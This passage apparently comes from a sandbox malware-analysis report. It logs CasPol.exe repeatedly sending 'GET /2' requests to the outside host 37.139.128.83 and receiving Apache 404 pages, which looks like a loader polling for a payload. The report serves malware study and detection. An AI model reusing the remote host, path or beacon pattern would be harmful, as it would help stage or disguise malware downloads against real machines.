                                                    Mar 20, 2023 13:22:51.264184952 CET466INData Raw: 35 63 0d 0a 0d 0a 0d 0a 20 20 20 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 0d 0a 20 20 20 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72
                                                    Data Ascii: 5c If you entered the URL manually please check your spelling and try again. 4b</p><p>49If you think this is a server error, please contactthe <a href="mailto:26postmaster@localhost">webmaster</a>.
                                                    Mar 20, 2023 13:22:51.264250994 CET467INData Raw: 31 34 0d 0a 0d 0a 3c 2f 70 3e 0d 0a 0d 0a 3c 68 32 3e 45 72 72 6f 72 20 0d 0a 32 33 0d 0a 34 30 34 3c 2f 68 32 3e 0d 0a 3c 61 64 64 72 65 73 73 3e 0d 0a 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 0d 0a 32 31 0d 0a 33 37 2e 31 33 39 2e 31 32 38 2e
                                                    Data Ascii: 14</p><h2>Error 23404</h2><address> <a href="/">2137.139.128.83</a><br /> <span>56Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33</span></address></body></html>2
                                                    Mar 20, 2023 13:22:51.264365911 CET467INData Raw: 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    37192.168.11.204986237.139.128.8380C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Mar 20, 2023 13:23:01.292118073 CET492OUTGET /2 HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                    Host: 37.139.128.83
                                                    Cache-Control: no-cache
                                                    Mar 20, 2023 13:23:01.376612902 CET493INHTTP/1.1 404 Not Found
                                                    Date: Mon, 20 Mar 2023 12:23:01 GMT
                                                    Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                                    Vary: accept-language,accept-charset
                                                    Accept-Ranges: bytes
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Language: en
                                                    Data Raw: 63 62 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 35 0d 0a 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e
                                                    Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
                                                    Mar 20, 2023 13:23:01.376636028 CET493INData Raw: 0d 0a 33 39 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 0d 0a 31 31 37 0d 0a 70 6f 73 74 6d 61 73 74 65 72 40 6c
                                                    Data Ascii: 39Object not found!</title><link rev="made" href="mailto:117postmaster@localhost" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p
                                                    Mar 20, 2023 13:23:01.376651049 CET494INData Raw: 35 63 0d 0a 0d 0a 0d 0a 20 20 20 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 0d 0a 20 20 20 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72
                                                    Data Ascii: 5c If you entered the URL manually please check your spelling and try again. 4b</p><p>49If you think this is a server error, please contactthe <a href="mailto:26postmaster@localhost">webmaster</a>.
                                                    Mar 20, 2023 13:23:01.376665115 CET494INData Raw: 31 34 0d 0a 0d 0a 3c 2f 70 3e 0d 0a 0d 0a 3c 68 32 3e 45 72 72 6f 72 20 0d 0a 32 33 0d 0a 34 30 34 3c 2f 68 32 3e 0d 0a 3c 61 64 64 72 65 73 73 3e 0d 0a 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 0d 0a 32 31 0d 0a 33 37 2e 31 33 39 2e 31 32 38 2e
                                                    Data Ascii: 14</p><h2>Error 23404</h2><address> <a href="/">2137.139.128.83</a><br /> <span>56Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33</span></address></body></html>2
                                                    Mar 20, 2023 13:23:01.376679897 CET494INData Raw: 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    38192.168.11.204986337.139.128.8380C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Mar 20, 2023 13:23:11.403112888 CET495OUTGET /2 HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                    Host: 37.139.128.83
                                                    Cache-Control: no-cache
                                                    Mar 20, 2023 13:23:11.436139107 CET495INHTTP/1.1 404 Not Found
                                                    Date: Mon, 20 Mar 2023 12:23:11 GMT
                                                    Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                                    Vary: accept-language,accept-charset
                                                    Accept-Ranges: bytes
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Language: en
                                                    Data Raw: 63 62 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 35 0d 0a 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e
                                                    Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
                                                    Mar 20, 2023 13:23:11.436197042 CET496INData Raw: 0d 0a 33 39 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 0d 0a 31 31 37 0d 0a 70 6f 73 74 6d 61 73 74 65 72 40 6c
                                                    Data Ascii: 39Object not found!</title><link rev="made" href="mailto:117postmaster@localhost" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p
                                                    Mar 20, 2023 13:23:11.436214924 CET496INData Raw: 35 63 0d 0a 0d 0a 0d 0a 20 20 20 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 0d 0a 20 20 20 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72
                                                    Data Ascii: 5c If you entered the URL manually please check your spelling and try again. 4b</p><p>49If you think this is a server error, please contactthe <a href="mailto:26postmaster@localhost">webmaster</a>.
                                                    Mar 20, 2023 13:23:11.436230898 CET496INData Raw: 31 34 0d 0a 0d 0a 3c 2f 70 3e 0d 0a 0d 0a 3c 68 32 3e 45 72 72 6f 72 20 0d 0a 32 33 0d 0a 34 30 34 3c 2f 68 32 3e 0d 0a 3c 61 64 64 72 65 73 73 3e 0d 0a 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 0d 0a 32 31 0d 0a 33 37 2e 31 33 39 2e 31 32 38 2e
                                                    Data Ascii: 14</p><h2>Error 23404</h2><address> <a href="/">2137.139.128.83</a><br /> <span>56Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33</span></address></body></html>2
                                                    Mar 20, 2023 13:23:11.436245918 CET496INData Raw: 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    39192.168.11.204986437.139.128.8380C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Mar 20, 2023 13:23:21.459638119 CET497OUTGET /2 HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                    Host: 37.139.128.83
                                                    Cache-Control: no-cache
                                                    Mar 20, 2023 13:23:21.510338068 CET498INHTTP/1.1 404 Not Found
                                                    Date: Mon, 20 Mar 2023 12:23:21 GMT
                                                    Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                                    Vary: accept-language,accept-charset
                                                    Accept-Ranges: bytes
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Language: en
                                                    Data Raw: 63 62 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 35 0d 0a 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e
                                                    Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
                                                    Mar 20, 2023 13:23:21.510406017 CET498INData Raw: 0d 0a 33 39 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 0d 0a 31 31 37 0d 0a 70 6f 73 74 6d 61 73 74 65 72 40 6c
                                                    Data Ascii: 39Object not found!</title><link rev="made" href="mailto:117postmaster@localhost" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p
                                                    Mar 20, 2023 13:23:21.510452032 CET499INData Raw: 35 63 0d 0a 0d 0a 0d 0a 20 20 20 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 0d 0a 20 20 20 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72
                                                    Data Ascii: 5c If you entered the URL manually please check your spelling and try again. 4b</p><p>49If you think this is a server error, please contactthe <a href="mailto:26postmaster@localhost">webmaster</a>.
                                                    Mar 20, 2023 13:23:21.510493040 CET499INData Raw: 31 34 0d 0a 0d 0a 3c 2f 70 3e 0d 0a 0d 0a 3c 68 32 3e 45 72 72 6f 72 20 0d 0a 32 33 0d 0a 34 30 34 3c 2f 68 32 3e 0d 0a 3c 61 64 64 72 65 73 73 3e 0d 0a 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 0d 0a 32 31 0d 0a 33 37 2e 31 33 39 2e 31 32 38 2e
                                                    Data Ascii: 14</p><h2>Error 23404</h2><address> <a href="/">2137.139.128.83</a><br /> <span>56Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33</span></address></body></html>2
                                                    Mar 20, 2023 13:23:21.510539055 CET499INData Raw: 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    4192.168.11.204980137.139.128.8380C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Mar 20, 2023 13:17:27.240505934 CET190OUTGET /2 HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                    Host: 37.139.128.83
                                                    Cache-Control: no-cache
                                                    Mar 20, 2023 13:17:27.319519997 CET191INHTTP/1.1 404 Not Found
                                                    Date: Mon, 20 Mar 2023 12:17:27 GMT
                                                    Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                                    Vary: accept-language,accept-charset
                                                    Accept-Ranges: bytes
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Language: en
                                                    Data Raw: 63 62 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 35 0d 0a 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e
                                                    Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
                                                    Mar 20, 2023 13:17:27.319586039 CET191INData Raw: 0d 0a 33 39 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 0d 0a 31 31 37 0d 0a 70 6f 73 74 6d 61 73 74 65 72 40 6c
                                                    Data Ascii: 39Object not found!</title><link rev="made" href="mailto:117postmaster@localhost" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p
                                                    Mar 20, 2023 13:17:27.336045980 CET192INData Raw: 35 63 0d 0a 0d 0a 0d 0a 20 20 20 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 0d 0a 20 20 20 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72
                                                    Data Ascii: 5c If you entered the URL manually please check your spelling and try again. 4b</p><p>49If you think this is a server error, please contactthe <a href="mailto:26postmaster@localhost">webmaster</a>.
                                                    Mar 20, 2023 13:17:27.336110115 CET192INData Raw: 31 34 0d 0a 0d 0a 3c 2f 70 3e 0d 0a 0d 0a 3c 68 32 3e 45 72 72 6f 72 20 0d 0a 32 33 0d 0a 34 30 34 3c 2f 68 32 3e 0d 0a 3c 61 64 64 72 65 73 73 3e 0d 0a 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 0d 0a 32 31 0d 0a 33 37 2e 31 33 39 2e 31 32 38 2e
                                                    Data Ascii: 14</p><h2>Error 23404</h2><address> <a href="/">2137.139.128.83</a><br /> <span>56Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33</span></address></body></html>2
                                                    Mar 20, 2023 13:17:27.336155891 CET192INData Raw: 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    40192.168.11.204986737.139.128.8380C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Mar 20, 2023 13:23:31.535437107 CET524OUTGET /2 HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                    Host: 37.139.128.83
                                                    Cache-Control: no-cache
                                                    Mar 20, 2023 13:23:31.623294115 CET525INHTTP/1.1 404 Not Found
                                                    Date: Mon, 20 Mar 2023 12:23:31 GMT
                                                    Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                                    Vary: accept-language,accept-charset
                                                    Accept-Ranges: bytes
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Language: en
                                                    Data Raw: 63 62 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 35 0d 0a 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e
                                                    Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
                                                    Mar 20, 2023 13:23:31.623338938 CET525INData Raw: 0d 0a 33 39 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 0d 0a 31 31 37 0d 0a 70 6f 73 74 6d 61 73 74 65 72 40 6c
                                                    Data Ascii: 39Object not found!</title><link rev="made" href="mailto:117postmaster@localhost" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p
                                                    Mar 20, 2023 13:23:31.623369932 CET526INData Raw: 35 63 0d 0a 0d 0a 0d 0a 20 20 20 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 0d 0a 20 20 20 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72
                                                    Data Ascii: 5c If you entered the URL manually please check your spelling and try again. 4b</p><p>49If you think this is a server error, please contactthe <a href="mailto:26postmaster@localhost">webmaster</a>.
                                                    Mar 20, 2023 13:23:31.623399019 CET526INData Raw: 31 34 0d 0a 0d 0a 3c 2f 70 3e 0d 0a 0d 0a 3c 68 32 3e 45 72 72 6f 72 20 0d 0a 32 33 0d 0a 34 30 34 3c 2f 68 32 3e 0d 0a 3c 61 64 64 72 65 73 73 3e 0d 0a 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 0d 0a 32 31 0d 0a 33 37 2e 31 33 39 2e 31 32 38 2e
                                                    Data Ascii: 14</p><h2>Error 23404</h2><address> <a href="/">2137.139.128.83</a><br /> <span>56Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33</span></address></body></html>2
                                                    Mar 20, 2023 13:23:31.623429060 CET526INData Raw: 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    41192.168.11.204986837.139.128.8380C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Mar 20, 2023 13:23:41.658135891 CET527OUTGET /2 HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                    Host: 37.139.128.83
                                                    Cache-Control: no-cache
                                                    Mar 20, 2023 13:23:41.731969118 CET527INHTTP/1.1 404 Not Found
                                                    Date: Mon, 20 Mar 2023 12:23:41 GMT
                                                    Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                                    Vary: accept-language,accept-charset
                                                    Accept-Ranges: bytes
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Language: en
                                                    Data Raw: 63 62 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 35 0d 0a 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e
                                                    Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
                                                    Mar 20, 2023 13:23:41.732053041 CET528INData Raw: 0d 0a 33 39 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 0d 0a 31 31 37 0d 0a 70 6f 73 74 6d 61 73 74 65 72 40 6c
                                                    Data Ascii: 39Object not found!</title><link rev="made" href="mailto:117postmaster@localhost" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p
                                                    Mar 20, 2023 13:23:41.744688988 CET528INData Raw: 35 63 0d 0a 0d 0a 0d 0a 20 20 20 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 0d 0a 20 20 20 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72
                                                    Data Ascii: 5c If you entered the URL manually please check your spelling and try again. 4b</p><p>49If you think this is a server error, please contactthe <a href="mailto:26postmaster@localhost">webmaster</a>.
                                                    Mar 20, 2023 13:23:41.744771004 CET528INData Raw: 31 34 0d 0a 0d 0a 3c 2f 70 3e 0d 0a 0d 0a 3c 68 32 3e 45 72 72 6f 72 20 0d 0a 32 33 0d 0a 34 30 34 3c 2f 68 32 3e 0d 0a 3c 61 64 64 72 65 73 73 3e 0d 0a 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 0d 0a 32 31 0d 0a 33 37 2e 31 33 39 2e 31 32 38 2e
                                                    Data Ascii: 14</p><h2>Error 23404</h2><address> <a href="/">2137.139.128.83</a><br /> <span>56Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33</span></address></body></html>2
                                                    Mar 20, 2023 13:23:41.744826078 CET528INData Raw: 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    42192.168.11.204986937.139.128.8380C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Mar 20, 2023 13:23:51.781950951 CET529OUTGET /2 HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                    Host: 37.139.128.83
                                                    Cache-Control: no-cache
                                                    Mar 20, 2023 13:23:51.810120106 CET530INHTTP/1.1 404 Not Found
                                                    Date: Mon, 20 Mar 2023 12:23:51 GMT
                                                    Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                                    Vary: accept-language,accept-charset
                                                    Accept-Ranges: bytes
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Language: en
